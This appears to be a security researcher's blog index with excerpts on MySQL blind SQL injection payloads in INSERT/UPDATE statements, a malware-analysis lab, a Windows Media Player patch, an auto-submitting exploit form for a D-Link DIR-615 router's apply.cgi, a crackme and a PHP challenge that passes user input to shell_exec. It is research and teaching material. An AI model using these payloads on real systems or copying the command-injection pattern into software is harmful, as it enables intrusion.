MySQL Blind Injection in Insert and Update Statements

I’m not going to explain or write about blind injection in general. There are enough resources on the internet where you can learn. You can check my previous post where I have explained in detail about other types of injections in these statements. Since some of you asked me how to perform blind injection I thought of writing this post.

Boolean Based Blind Injection

We can use ‘+’ or bitwise OR in this scenario. If the result is true the entry will be updated with a ‘1’ and if the result is false the entry will be updated with a ‘0’.
I’m using binary search to make the search faster. Mid = (max+min)/2.
However I’m not sure if this is realistic. 

update users set username =0’ | (substr(user(),1,1) regexp 0x5e5b6d2d7a5d) where id=14;

insert into users values (15,’osanda’,'0'| (substr(user(),1,1) regexp 0x5e5b6d2d7a5d));

Time Based Blind Injection

This approach would be realistic. In this case we can use functions such as sleep(), benchmark(). Like before by using ‘+’ or bitwise OR we can know if the result is true or false when updated or inserted.

update users set username = '0'|if((substr(user(),1,1) regexp 0x5e5b6d2d7a5d), sleep(5), 1) where id=15;

insert into users values (16,’osanda’,'0'| if((substr(user(),1,1) regexp 0x5e5b6d2d7a5d), sleep(5), 1));

Conclusion

The same can be applied to DELETE statements as well, but the injection is not realistic. There are many methods you can follow using the above syntax. You can develop your own tool to automate this process and improve the efficiency of the search.

Lab01-01 Analysis

In my leisure time I like reading the book Practical Malware Analysis and I thought of sharing my analysis in the practical sections. You can find detailed answers in the book as well.

  • Lab01-01.dll – https://virustotal.com/en/file/f50e42c8dfaab649bde0398867e930b86c2a599e8db83b8260393082268f2dba/analysis/
  • Lab01-01.exe https://virustotal.com/en/file/58898bd42c5bd3bf9b1389f0eee5b39cd59180e8370eb9ea838a0b327bd6fe47/analysis/

Lab01-01.dll Analysis

If we have a look at the “Lab01-01.dll” file’s imports we can see that it uses network functions from “ws2_32.dll”. We can suspect that this file is responsible for network communications to the attacker.
imports-of-dll

But if we have a look at the exports section we see nothing, which is strange.
no-exports-dll
(more…)

Patching Windows Media Player

I’m writing this post on the request of @rudr4_sarkar. This is a very simple patch in which you can open multiple instances of wmplayer. It basically uses the ‘CreateMutexW’ API to create a mutex object with the string “Local\Microsoft_WMP_70_CheckForOtherInstanceMutex”.

screenshot_2

The pseudo code would be something like this
[code language=”c”]
HANDLE hMutex = CreateMutex(NULL, FALSE, L"Local\Microsoft_WMP_70_CheckForOtherInstanceMutex");
if (GetLastError() == ERROR_ALREADY_EXISTS) {

}
[/code]
You just need to patch the ‘JNZ’ to a ‘JMP’ instruction, that will always jump to the good boy 🙂

disass (more…)

D-Link DIR-615 Open Redirection and XSS

D-Link DIR-615
Hardware Version: E3
Firmware Version: 5.10

The ‘apply.cgi’ file was vulnerable to Open Redirection and XSS. Inside the router many other cgi files too use this functionality in ‘apply.cgi’. For example the ‘ping_response.cgi’ file.

Open Redirection

apply.cgi

<html>
<!-- @OsandaMalith -->
  <body>
    <form action="http://192.168.0.1/apply.cgi" method="POST" id="exploit">
      <input type="hidden" name="html_response_page" value="https://google.lk" />
      <input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
    <img src=x onerror="exploit.submit()"/>
    </form>
  </body>
</html>

(more…)

Random CrackMe

This is an interesting crackme I found randomly. You can download it from here: http://www.mediafire.com/file/5r3a3uqsg1pbp4v/CrackMe1.zip

The algorithm uses the PID of the application for the serial key calculation. It also uses the ‘GetComputerName’ and ‘GetUserName’ win32 APIs in generating the serial key. The length of both results are used for the loops and each ascii value is added. These results are used in the final calculation in the serial key.
This graph is from the OllyGraph plugin.

View post on imgur.com


(more…)

Journey into eWPTX

eWPTX

On the request of some people I thought of writing a small review for this course and certificate. The course is WAPTx – Web Application Penetration Tesing eXtreme. The certificate is eWPTX – eLearnSecurity Web application Penetration Tester eXtreme. Last year I completed eWPT you check that post from here.
This course is very up to date compared to other web application penetration testing courses. I learned many things that I didn’t know in different web application technologies. There are many languages, technologies in the world of web applications. It’s very hard to master them all. This course however covers many advanced attack methodologies.

The exam is however “hard”, not matter you are a web developer or a networking guy, you need to make sure you understand how each vulnerability is exploited and also how to bypass filters. You cannot just fire up a tool and expect results. Make sure you understand manual exploitation and exploitation is always not straight forward in real world applications.

I actually loved the exam, it was a very small web app but lots of unseen holes. My experience with SQL injections came in handy in the exam 😉

If you are seeking for a next level certification in web application hacking I would recommend this course.

It was a very fast year! 2016 ended nicely as I planned. By October completed eCPPT, by November completed eCRE, by December completed eWPTX 🙂 Nothing is impossible if you try hard 😉

Thank you everyone for your feedback and messages!

cert

[tweet https://twitter.com/eLearnSecurity/status/814775586640068608]

PHP Feature or 0day?

Today one of my friends @RakeshMane10 gave me a challenge which I found pretty interesting.

[code language=”php”]
<?php
ini_set(‘error_displays’, 0);
$ip = htmlspecialchars($_GET[‘url’], ENT_QUOTES);
$f = fsockopen($ip, 80, $errno, $errstr, 5);
if($f) {
$result = shell_exec(‘ping -c 1 ‘ . $ip);
echo ‘<div class="alert alert-success">’ . nl2br($result) . ‘</div>’;
} else {
echo ‘<div class="alert alert-danger">’ .$errstr . ‘</div>’;
}
?>
[/code]
(more…)